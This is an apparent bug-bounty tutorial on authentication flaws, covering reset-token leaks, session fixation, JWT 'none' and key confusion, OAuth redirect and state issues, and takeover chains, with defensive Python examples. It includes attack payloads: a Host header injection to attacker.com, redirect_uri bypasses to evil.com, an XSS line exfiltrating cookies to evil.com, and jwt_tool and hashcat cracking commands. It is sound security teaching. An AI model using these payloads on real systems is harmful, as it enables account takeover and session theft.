Web Vulnerability Classes

Authentication & Session Flaws


Authentication Failures is #7 on OWASP Top 10:2025. Weak authentication leads to account takeover, the most impactful bug class for users.

Password Reset Vulnerabilities

Token Leakage

# Check if token appears in Referer header
1. Request password reset
2. Click reset link
3. Page loads external resource (image, script)
4. Token leaked in Referer header

# Check token in URL vs POST body
# URL tokens can leak via browser history, logs

Weak Tokens

# Test token predictability
# Request multiple resets, compare tokens
Token 1: abc123def456
Token 2: abc123def457  # Sequential = predictable!

# Test token reuse
# Can old tokens still work?
# What's the expiration time?

Host Header Injection

# Inject malicious host in reset request
POST /reset-password HTTP/1.1
Host: attacker.com
X-Forwarded-Host: attacker.com

# If email contains: https://attacker.com/reset?token=xxx
# User clicks → token sent to attacker
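The three reset-flow weaknesses above (leaky or guessable tokens, reusable or never-expiring tokens, and a link host copied from the request) come down to a handful of server-side decisions. The following is an added example, not code from the page: a minimal reset-token store that issues CSPRNG tokens, keeps only their hash, expires and single-uses them, and builds the email link from a configured origin, shown beside the vulnerable link builder that trusts Host/X-Forwarded-Host. It also includes the two checks a tester would run on tokens collected from a target: an entropy estimate and a sequential-increment detector. `CANONICAL_ORIGIN`, the 15-minute TTL and the in-memory dict are assumptions for the example.

```python
import hashlib
import math
import secrets
import time
from urllib.parse import quote

# The origin that goes into reset emails is configuration, never a request
# header. (Constructed value for this example.)
CANONICAL_ORIGIN = "https://example.com"
TOKEN_TTL_SECONDS = 15 * 60

# sha256(token) -> (user_id, expires_at). Only the hash is stored, so a leaked
# table of pending resets does not yield working links.
_reset_tokens = {}


def _fingerprint(token):
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(user_id, now=None):
    """Issue a fresh, unpredictable token bound to user_id with a short TTL."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
    _reset_tokens[_fingerprint(token)] = (user_id, now + TOKEN_TTL_SECONDS)
    return token


def consume_reset_token(token, now=None):
    """Redeem a token exactly once. Unknown, expired and already-used tokens
    all return None; the entry is removed on first use, so replay fails."""
    now = time.time() if now is None else now
    entry = _reset_tokens.pop(_fingerprint(token), None)
    if entry is None:
        return None
    user_id, expires_at = entry
    return user_id if now <= expires_at else None


def build_reset_link_vulnerable(headers, token):
    """The pattern behind Host header injection: the link host is copied from
    the request, so a poisoned Host/X-Forwarded-Host lands in the victim's email."""
    host = headers.get("X-Forwarded-Host") or headers.get("Host")
    return f"https://{host}/reset-password?token={quote(token, safe='')}"


def build_reset_link(token):
    """Hardened form: the host comes from configuration only."""
    return f"{CANONICAL_ORIGIN}/reset-password?token={quote(token, safe='')}"


def estimate_entropy_bits(token):
    """Upper bound on token entropy from its length and the alphabet it appears
    to use (digits, hex or base64url). Anything well under 128 bits is worth
    flagging in a review."""
    if token.isdigit():
        alphabet = 10
    elif all(c in "0123456789abcdefABCDEF" for c in token):
        alphabet = 16
    elif all(c.isalnum() or c in "-_" for c in token):
        alphabet = 64
    else:
        alphabet = len(set(token))
    return len(token) * math.log2(alphabet)


def looks_sequential(tokens, max_step=1000):
    """Flag tokens that are small increments of one another (abc123def456,
    abc123def457, ...). Tokens are read as base-36 integers; tokens with
    characters outside [0-9a-z] cannot be compared this way and are not flagged."""
    try:
        values = [int(t, 36) for t in tokens]
    except ValueError:
        return False
    diffs = [abs(b - a) for a, b in zip(values, values[1:])]
    return bool(diffs) and all(0 < d <= max_step for d in diffs)
```

The two tokens from the Weak Tokens section score 48 bits and are flagged as sequential; a `secrets.token_urlsafe(32)` token scores around 258 bits and is not.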

Session Management

Session Fixation

# Can you set session ID before login?
1. Attacker visits site, gets session ID: ABC123
2. Attacker sends victim link with session ID
3. Victim logs in with attacker's session ID
4. Attacker now has authenticated session

# Test:
# Does session ID change after login?
# Can you set session via URL parameter?

Session Token Analysis

# Check cookie security flags
Set-Cookie: session=xyz;
# Missing HttpOnly → XSS can steal
# Missing Secure → HTTP interception
# Missing SameSite → CSRF vulnerable

# Analyze token entropy
# Short tokens = brute forceable
# Sequential = predictable
# Timestamp-based = predictable
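Both checks in the Session Management section (does the ID change at login, and which flags does the cookie carry) can be expressed as code that a defender can drop into a test suite. This added example is not from the page: a tiny session store with the fixation-prone login beside the regenerating one, plus a `Set-Cookie` auditor that reports exactly the three missing flags called out above. Cookie name, attribute choices and the in-memory store are assumptions.

```python
import secrets


def audit_set_cookie(header_value):
    """Return the session-cookie protections missing from one Set-Cookie value.
    Attribute names are matched case-insensitively (RFC 6265). SameSite is
    reported missing when it is absent or set to None, since neither stops CSRF."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    attrs = {}
    for part in parts[1:]:  # parts[0] is the name=value pair
        name, _, value = part.partition("=")
        attrs[name.strip().lower()] = value.strip().lower()
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")  # script (XSS) can read the cookie
    if "secure" not in attrs:
        missing.append("Secure")    # cookie is also sent over plain HTTP
    if attrs.get("samesite") not in ("lax", "strict"):
        missing.append("SameSite")  # cross-site requests carry the cookie
    return missing


class SessionStore:
    """Minimal server-side session table keyed by session ID."""

    def __init__(self):
        self._sessions = {}

    def create_anonymous(self):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def login_vulnerable(self, sid, user):
        """Session fixation as the section describes: the pre-login ID (even one
        the server never issued, e.g. supplied via a URL parameter) is kept and
        promoted to an authenticated session, so whoever chose it now owns it."""
        self._sessions.setdefault(sid, {"user": None})["user"] = user
        return sid

    def login(self, sid, user):
        """Hardened form: discard the pre-authentication ID and issue a new one."""
        self._sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"user": user}
        return new_sid

    def user_for(self, sid):
        session = self._sessions.get(sid)
        return session["user"] if session else None

    @staticmethod
    def set_cookie_header(sid):
        """The Set-Cookie value the login response should carry."""
        return f"session={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"
```

Run `audit_set_cookie` over the `Set-Cookie` headers captured from a login response; the page's own `session=xyz;` example reports all three flags missing.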

JWT Vulnerabilities

Algorithm Confusion

# Change algorithm to 'none'
# Original header
{"alg": "RS256", "typ": "JWT"}

# Modified header (base64 encode)
{"alg": "none", "typ": "JWT"}

# Send without signature
<header>.<payload>.

Key Confusion Attack

# RS256 → HS256 attack
# Server uses public key for RS256 verification
# Attack: Sign with HS256 using public key as secret

# Tools
jwt_tool <token> -X a  # Algorithm attacks
jwt_tool <token> -I -pc user -pv admin  # Payload injection

Common JWT Issues

| Issue | Test |
| --- | --- |
| None algorithm | Set alg to "none" |
| Weak secret | Brute force with hashcat |
| No expiration | Check for missing "exp" claim |
| Sensitive data in payload | Base64 decode, check contents |

# Crack weak JWT secrets
hashcat -a 0 -m 16500 jwt.txt wordlist.txt
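The JWT issues in this section share one root cause: the verifier lets the token's own header decide how it is verified. The following is an added example, not from the page or from jwt_tool: a verifier that only dispatches to an allowlist of algorithms (so `none` has nowhere to go), binds every registered key to a single algorithm (so a public key can never be used as an HMAC secret, which is the RS256 to HS256 confusion), and treats a missing `exp` as a failure. Key IDs and key material are constructed for the example; the RS256 entry is a placeholder that exists only to show the key/algorithm binding, and RS256 verification itself is outside this example.

```python
import base64
import hashlib
import hmac
import json

# Each key is registered together with the single algorithm it may verify.
# Constructed demo key material; the RS256 entry is a placeholder and shows
# only that such a key can never be used as an HMAC secret.
KEYS = {
    "hs-1": {"alg": "HS256", "secret": b"constructed-demo-secret-not-for-reuse"},
    "rs-1": {"alg": "RS256", "public_key": "<PEM public key placeholder>"},
}


def _b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _json_b64(obj):
    return _b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def encode_token(header, payload, hmac_secret=None):
    """Build header.payload.signature. With hmac_secret the third segment is an
    HS256 MAC; without it the segment is empty, i.e. the 'alg: none' shape used
    here only as a negative test vector."""
    signing_input = f"{_json_b64(header)}.{_json_b64(payload)}"
    if hmac_secret is None:
        return signing_input + "."
    mac = hmac.new(hmac_secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(mac)}"


def sign_hs256(payload, kid):
    return encode_token({"alg": "HS256", "typ": "JWT", "kid": kid}, payload,
                        KEYS[kid]["secret"])


def _verify_hs256(key, signing_input, signature):
    expected = hmac.new(key["secret"], signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, signature)


# Only algorithms listed here can ever run; "none" has no entry.
VERIFIERS = {"HS256": _verify_hs256}


def verify(token, now):
    """Return the payload or raise ValueError. The header's alg only selects
    which verifier may run; the registered key decides whether that alg is
    legitimate for it, which is what blocks RS256->HS256 confusion."""
    try:
        h_b64, p_b64, s_b64 = token.split(".")
        header = json.loads(_b64url_decode(h_b64))
        payload = json.loads(_b64url_decode(p_b64))
        signature = _b64url_decode(s_b64)
        if not isinstance(header, dict) or not isinstance(payload, dict):
            raise ValueError("segments are not JSON objects")
    except ValueError:  # wrong segment count, bad base64, bad JSON
        raise ValueError("malformed token")
    alg = header.get("alg")
    if alg not in VERIFIERS:
        raise ValueError(f"algorithm not allowed: {alg!r}")
    key = KEYS.get(header.get("kid"))
    if key is None or key["alg"] != alg:
        raise ValueError("unknown key or key/algorithm mismatch")
    if not VERIFIERS[alg](key, f"{h_b64}.{p_b64}", signature):
        raise ValueError("bad signature")
    if "exp" not in payload:
        raise ValueError("missing exp claim")  # the 'No expiration' row above
    if now >= payload["exp"]:
        raise ValueError("token expired")
    return payload


def accepts(token, now):
    """Boolean wrapper around verify() for tests and log lines."""
    try:
        verify(token, now)
        return True
    except ValueError:
        return False
```

Feeding this verifier the `none` token and the HS256-with-public-key token from the attacks above yields rejections before any signature check runs; a weak HMAC secret, the remaining row in the table, is the one thing code cannot fix and is why the hashcat check still matters.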

OAuth/SSO Vulnerabilities

Open Redirect in OAuth

# Manipulate redirect_uri
/oauth/authorize?redirect_uri=https://evil.com/callback

# Bypass validation
redirect_uri=https://legit.com.evil.com
redirect_uri=https://legit.com%40evil.com
redirect_uri=https://legit.com/callback/../../../evil

CSRF in OAuth Flow

# Missing state parameter
# Attack: Send victim OAuth URL without state
# Victim's account linked to attacker's identity
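The redirect_uri bypasses and the missing state parameter are both authorization-server and client-side validation failures, so the defensive counterpart is short. This added example is not code from the page: a prefix-based redirect_uri check that every bypass listed above slips past, beside the exact-string comparison the OAuth 2.0 Security BCP calls for, and a state parameter that is minted per browser session, compared in constant time and consumed on first use so a callback without a matching state (the CSRF described above) is refused. The client registration and session dict are constructed for the example.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed client registration: exactly one callback URI per client.
REGISTERED_REDIRECT_URIS = {
    "client-123": {"https://legit.com/callback"},
}


def redirect_uri_allowed_vulnerable(client_id, redirect_uri):
    """Prefix match on scheme://host, the check each bypass in the Open
    Redirect section is shaped to slip past."""
    for allowed in REGISTERED_REDIRECT_URIS.get(client_id, ()):
        parts = urlsplit(allowed)
        if redirect_uri.startswith(f"{parts.scheme}://{parts.netloc}"):
            return True
    return False


def redirect_uri_allowed(client_id, redirect_uri):
    """Exact string comparison against the registered values. No prefix,
    suffix, wildcard or path normalisation, so legit.com.evil.com,
    legit.com%40evil.com and ../ traversal all fail."""
    return redirect_uri in REGISTERED_REDIRECT_URIS.get(client_id, ())


def begin_authorization(session):
    """Mint an unguessable state, bind it to this browser session and return
    it for inclusion in the authorization request."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state


def handle_callback(session, callback_url):
    """Return the authorization code only if the callback carries the state
    bound to this session. Missing, foreign or replayed state returns None,
    which is what stops the attacker-identity account-linking CSRF."""
    params = parse_qs(urlsplit(callback_url).query)
    presented = params.get("state", [None])[0]
    expected = session.pop("oauth_state", None)  # single use: replay fails
    if not expected or not presented:
        return None
    if not hmac.compare_digest(expected.encode(), presented.encode()):
        return None
    return params.get("code", [None])[0]
```

The `%40` payload is worth a note: the exact-match check never decodes it, whereas any downstream component that does would read `legit.com` as userinfo and `evil.com` as the host, which is why normalising before comparing is the wrong fix.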

Token Leakage

# Access token in URL fragment
# Check browser history, Referer leakage
# Check if access_token appears in server logs

Account Takeover Chains

Example Chain: Password Reset + IDOR

1. Find IDOR in user settings
2. Change victim's email to attacker's
3. Request password reset
4. Reset link sent to attacker
5. Account takeover achieved

Example Chain: XSS + Session Hijacking

1. Find stored XSS in profile
2. Inject: <script>fetch('https://evil.com/?c='+document.cookie)</script>
3. Victim views profile
4. Session cookie exfiltrated
5. Login as victim

Testing Checklist

  • Password reset token predictability
  • Token expiration and reuse
  • Host header injection in reset emails
  • Session ID regeneration after login
  • Cookie security flags (HttpOnly, Secure, SameSite)
  • JWT algorithm vulnerabilities
  • OAuth redirect_uri validation
  • OAuth state parameter presence

Bounty Examples

| Bug | Company | Bounty |
| --- | --- | --- |
| JWT none algorithm | Auth0 | $10,000 |
| Password reset token leak | Twitter | $5,040 |
| OAuth redirect bypass | Facebook | $7,500 |
| Session fixation | Shopify | $3,000 |

Pro Tip: Authentication bugs often require chaining. A low-severity information disclosure + authentication flaw = critical account takeover.

Next, we'll explore Server-Side Request Forgery (SSRF).
